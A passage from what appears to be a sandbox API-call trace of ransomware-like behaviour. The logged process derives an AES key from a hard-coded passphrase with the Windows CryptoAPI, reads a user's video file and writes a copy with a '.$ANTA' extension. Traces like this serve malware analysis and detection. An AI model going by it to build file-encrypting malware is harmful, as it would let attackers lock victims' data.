lpUsedDefaultChar=0x0) returned 21 [0097.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0097.226] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0097.227] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0097.227] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.227] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0097.227] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.227] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.227] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.227] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0097.228] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.228] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.228] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca610, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0097.228] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0097.228] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.229] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0097.229] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0097.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0097.229] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0097.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0097.230] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0097.230] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0097.230] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0097.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\vj4prqa2pjimduescam.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0097.231] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.231] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.232] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0097.232] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0097.232] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0097.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0097.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0097.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0097.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369bb8 [0097.234] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml")) returned 0x10 [0097.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0097.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0097.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0097.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0097.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0097.235] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\vj4prqa2pjimduescam.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0097.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.236] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0097.236] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0097.236] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0097.236] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0097.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0097.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0097.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0097.241] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0097.241] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x4bf9, lpOverlapped=0x0) returned 1 [0097.241] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0097.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4bf9) returned 0x4516010 [0097.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 